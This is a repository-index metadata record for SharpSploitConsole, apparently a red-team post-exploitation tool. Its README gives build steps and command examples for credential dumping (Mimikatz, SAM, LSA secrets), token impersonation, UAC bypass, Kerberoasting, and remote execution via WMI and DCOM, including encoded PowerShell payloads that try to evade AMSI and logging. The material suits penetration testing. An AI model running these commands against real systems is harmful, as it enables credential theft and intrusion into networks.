{"id":13799617,"url":"https://github.com/anthemtotheego/SharpSploitConsole","last_synced_at":"2025-05-13T08:31:44.081Z","repository":{"id":114906504,"uuid":"151307265","full_name":"anthemtotheego/SharpSploitConsole","owner":"anthemtotheego","description":null,"archived":false,"fork":false,"pushed_at":"2022-02-21T15:12:26.000Z","size":4425,"stargazers_count":178,"open_issues_count":0,"forks_count":38,"subscribers_count":11,"default_branch":"master","last_synced_at":"2024-08-04T00:04:10.127Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/anthemtotheego.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2018-10-02T18:57:46.000Z","updated_at":"2023-09-28T10:54:32.000Z","dependencies_parsed_at":null,"dependency_job_id":"660abd76-4aa9-4354-9fec-8a2dc7acdfde","html_url":"https://github.com/anthemtotheego/SharpSploitConsole","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/anthemtotheego%2FSharpSploitConsole","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/anthemtotheego%2FSharpSploitConsole/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/anthemtotheego%2FSharpSploitConsole/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/anthemtotheego%2FSharpSploitConsole/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/anthemtotheego","download_url":"https://codeload.github.com/anthemtotheego/SharpSploitConsole/
tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225190629,"owners_count":17435456,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T00:01:04.493Z","updated_at":"2024-11-18T14:30:45.384Z","avatar_url":"https://github.com/anthemtotheego.png","language":"C#","readme":"# SharpSploitConsole\n\nConsole Application designed to interact with SharpSploit released by @cobbr_io \u003e https://github.com/cobbr/SharpSploit\n\nSharpSploit is a tool written by @cobbr_io that combines many techniques/C# code from the infosec community and combines it into one sweet DLL.  It's awesome so check it out! \n\nDescription\n============\nSharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit.  By following the instructions below you should be able to embed both the SharpSploit.dll and System.Management.Automation.dll into the SharpSploitConsole binary, creating a standalone exe you can drop on an appropriate target system and run over a non-interactive shell (such as beacon).  \n\nThis concept can be applied to many C# binaries.  For example, we could embed the System.Management.Automation.dll into our favorite C# NoPowershell.exe, creating a binary that doesn't rely on the System.Management.Automation.dll on the target system.\n\nLastly, I am aware there are probably thousands of ways to make this better, faster, cooler, stealthier etc. So please feel free to let me know....in a nice way. 
:)  I also plan to add more modules and improve others.\n\nContact at:\n- Twitter: @anthemtotheego or @g0ldengunsec\n\n**Before submitting issues, this tool may not always be updated actively. I encourage you to borrow, add, mod, and/or make your own.  Remember, all the awesome code out there (and there is a lot) can be taken/modified to create your own custom tools.**\n\n![Alt text](/sharpsploitimg1.PNG?raw=true \"SharpSploitConsole\")\n![Alt text](/sharpsploitimg2.PNG?raw=true \"\")\n\nSetup - Quick and Dirty\n==============================\n\n**Note: I used Windows 10, Visual Studio 2017 - mileage may vary**\n\n1. Download SharpSploit tool from https://github.com/cobbr/SharpSploit.git\n\n2. Open up SharpSploit.sln in Visual Studio and compile (make sure to compile for correct architecture) - Should see drop down with Any    CPU \u003e Click on it and open Configuration Manager \u003e under platform change to desired architecture and select ok.\n\n3. Download SharpSploitConsole tool and open up SharpSploitConsole.sln\n\n4. Copy both SharpSploit.dll and System.Management.Automation.dll found in SharpSploit/bin/x64/Debug directory into                        SharpSploitConsole/bin/x64/Debug folder\n\n5. Next we will set up visual studio to embed our DLL's into our exe so we can just have a single binary we can run on our target          machine. We will do this by doing the following:\n\n  In visual studio:\n\n   a. Tools \u003e NuGet Package Manager \u003e Package Manager Console\n \n   b. Inside console run:\n\n      Install-Package Costura.Fody\n  \n   c. Open up notepad and paste the following code below and save it with the name FodyWeavers.xml inside the SharpSploitConsole               directory that holds your bin, obj, properties folders.\n\n        \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n        \u003cWeavers\u003e\n          \u003cCostura /\u003e\n        \u003c/Weavers\u003e\n\n6. 
Inside visual studio, right click References on the righthand side, choose Add Reference, then browse to the                            SharpSploitConsole/bin/x64/Debug directory where we put our two DLL's, select them and add them.\n\n7. Compile, drop binary on target computer and have fun.\n\nExamples \n========\n\nNote:  All commands are case insensitive\n\nBy default all commands can be taken in as command line args, they will be executed and the program will exit (great for remote shells).  This looks something like the following: sharpSploitConsole.exe getSystem logonPasswords.  Alternatively, if you want to use the interactive console mode, you can use the interact command to get a pseudo-interactive shell.\n\nStart interactive console mode:\n\n```Interact```\n\nMimikatz all the things (does not run DCSync) - requires admin or system:\n\n```Mimi-All```\n\nRuns a specific Mimikatz command of your choice - requires admin or system:\n\n```Mimi-Command privilege::debug sekurlsa::logonPasswords```\n\nRuns the Mimikatz command privilege::debug sekurlsa::logonPasswords - requires admin or system:\n\n```logonPasswords```\n\nRuns the Mimikatz command to retrieve Domain Cached Credentials hashes from registry - requires admin or system:\n\n```LsaCache```\n\nRuns the Mimikatz command to retrieve LSA Secrets stored in registry - requires admin or system:\n\n```LsaSecrets```\n\nRetrieve password hashes from the SAM database - requires admin or system:\n\n```SamDump```\n\nRetrieve Wdigest credentials from registry - requires admin or system:\n\n```Wdigest```\n\nRetrieve current user:\n\n```whoami```\n\n```Username```\n\nImpersonate system user - requires admin rights:\n\n```GetSystem```\n\nImpersonate system user - Impersonate the token of a specified process, requires pid - command requires admin rights:\n\n```Impersonate 2918```\n\nBypass UAC - requires binary | command | path to binary - requires admin rights:\n\n```BypassUAC cmd.exe ipconfig 
C:\\Windows\\System32\\```\n\n```BypassUAC cmd.exe \"\" C:\\Windows\\System32\\```\n\nEnds the impersonation of any token, reverts back to initial token associated with current process:\n\n```RevertToSelf```\n\nRetrieve current working directory:\n\n```CurrentDirectory```\n\nRetrieve current directory listing:\n\n```DirectoryListing```\n\nChanges the current directory by appending a specified string to the current working directory:\n\n```ChangeDirectory SomeFolder```\n\nRetrieve hostname:\n\n```Hostname```\n\nRetrieve list of running processes:\n\n```ProcessList```\n\nCreates a minidump of the memory of a running process, requires PID | output location | output name - requires admin:\n\n```ProcDump 2198 C:\\Users\\Username\\Desktop memorydump.dmp```\n\nRetrieve registry path value, requires full path argument:\n\n```ReadRegistry HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\COM3\\BuildNumber```\n\nWrite to registry, requires full path argument and value argument:\n\n```WriteRegistry HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\COM3\\RemoteAccessEnabled 1```\n\nRetrieve users of local group remotely, requires computername | groupname | username | password:\n\n```NetLocalGroupMembers computerName Administrators domain\\username P@55w0rd!```\n\n```NetLocalGroupMembers 192.168.1.20 Administrators .\\username P@55w0rd!```\n\nRetrieve local groups remotely, requires computername | username | password:\n\n```NetLocalGroups computerName domain\\username P@55w0rd!```\n\n```NetLocalGroups 192.168.1.20 .\\username P@55w0rd!```\n\nRetrieve current logged on users remotely, requires computername | username | password:\n\n```NetLoggedOnUsers computerName domain\\username P@55w0rd!```\n\n```NetLoggedOnUsers 192.168.1.20 .\\username P@55w0rd!```\n\nRetrieve user sessions remotely, requires computername | username | password:\n\n```NetSessions computerName domain\\username P@55w0rd!```\n\n```NetSessions 192.168.1.20 .\\username P@55w0rd!```\n\nPing systems, requires 
computernames:\n\n```Ping computer1 computer2 computer3 computer4```\n\nPort scan systems, requires computername | ports:\n\n```PortScan computer1 80 443 445 22 23```\n\nGet Domain Users, Grabs specified (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:\n\n```GetDomainUsers```\n\nGet Domain Groups, Grabs specified (or all) group objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:\n\n```GetDomainGroups```\n\n```GetDomainGroups -target \"Domain Admins\"```\n\nGet Domain Computers, Grabs specified (or all) computer objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:\n\n```GetDomainComputers```\n\nPerform Kerberoasting, Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target\n\n```Kerberoast```\n\n```Kerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlService```\n\nRun command remotely via WMI, requires computername | username | password | command - requires admin:\n\n```WMI computer1 domain\\username P@55w0rd! \u003centire powershell empire payload\u003e```\n\n```WMI computer1 .\\username P@55w0rd! 
powershell -noP -sta -w 1 -enc \u003cBase64\u003e```\n\nRun command remotely via DCOM, requires computername | command | directory | params - requires admin:\n\n```DCOM computer1 cmd.exe c:\\Windows\\System32 powershell -noP -sta -w 1 -enc \u003cBase64\u003e```\n\nRun shell command:\n\n```Shell ipconfig /all```\n\nRun powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging:\n\n```Powershell -noP -sta -w 1 -enc \u003cBase64\u003e```\n\n# Currently available options (more to come)                           \n    \n- **Interact**              : Starts interactive console mode, if you are interacting remotely you may not want to use this option   \n- **Mimi-All**              : Executes everything but DCSync, requires admin\n- **Mimi-Command**          : Executes a chosen Mimikatz command\n- **logonPasswords**        : Runs privilege::debug sekurlsa::logonPasswords\n- **LsaCache**              : Retrieve Domain Cached Credentials hashes from registry\n- **LsaSecrets**            : Retrieve LSA secrets stored in registry\n- **SamDump**               : Retrieve password hashes from the SAM database\n- **Wdigest**               : Retrieve Wdigest credentials from registry\n- **whoami**                : Retrieve current user \n- **GetSystem**             : Impersonate system user, requires admin rights\n- **Impersonate**           : Impersonate the token of a specified process, requires pid - command requires admin rights.\n- **BypassUAC**             : Bypass UAC, requires binary | command | path to binary - requires admin rights\n- **RevertToSelf**          : Ends the impersonation of any token, reverts back to initial token associated with current process\n- **CurrentDirectory**      : Retrieve current working directory\n- **DirectoryListing**      : Retrieve current directory listing\n- **ChangeDirectory**       : Changes the current directory by appending a specified string to the current working directory\n- **Hostname**            
  : Retrieve hostname\n- **ProcessList**           : Retrieve list of running processes\n- **ProcDump**              : Creates a minidump of the memory of a running process, requires PID | output location | output name - requires admin\n- **Username**              : Retrieve current username\n- **ReadRegistry**          : Retrieve registry path value, requires full path argument\n- **WriteRegistry**         : Write to registry, requires full path argument | value\n- **NetLocalGroupMembers**  : Retrieve users of local group remotely, requires computername | groupname | username | password\n- **NetLocalGroups**        : Retrieve local groups remotely, requires computername | username | password\n- **NetLoggedOnUsers**      : Retrieve current logged on users remotely, requires computername | username | password\n- **NetSessions**           : Retrieve user sessions remotely, requires computername | username | password\n- **Ping**                  : Ping systems, requires computernames\n- **PortScan**              : Port scan systems, requires computername | ports\n- **GetDomainUsers**        : Grabs specified (or all) user objects in the target domain, by default will use current user context\n- **GetDomainGroups**       : Grabs specified (or all) group objects in the target domain, by default will use current user context\n- **GetDomainComputers**    : Grabs specified (or all) computer objects in the target domain, by default will use current user context\n- **Kerberoast**            : Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context\n- **WMI**                   : Run command remotely via WMI, requires computername | username | password | command - requires admin\n- **DCOM**                  : Run command remotely via DCOM, requires computername | command | directory | params - requires admin\n- **Shell**                 : Run a shell command\n- **Powershell**            : Runs a 
powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging\n\n","funding_links":[],"categories":["[↑](#table-of-contents) Misc","Pentesting"],"sub_categories":["Post Exploitation Frameworks \u0026 Tools","ARM"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fanthemtotheego%2FSharpSploitConsole","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fanthemtotheego%2FSharpSploitConsole","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fanthemtotheego%2FSharpSploitConsole/lists"}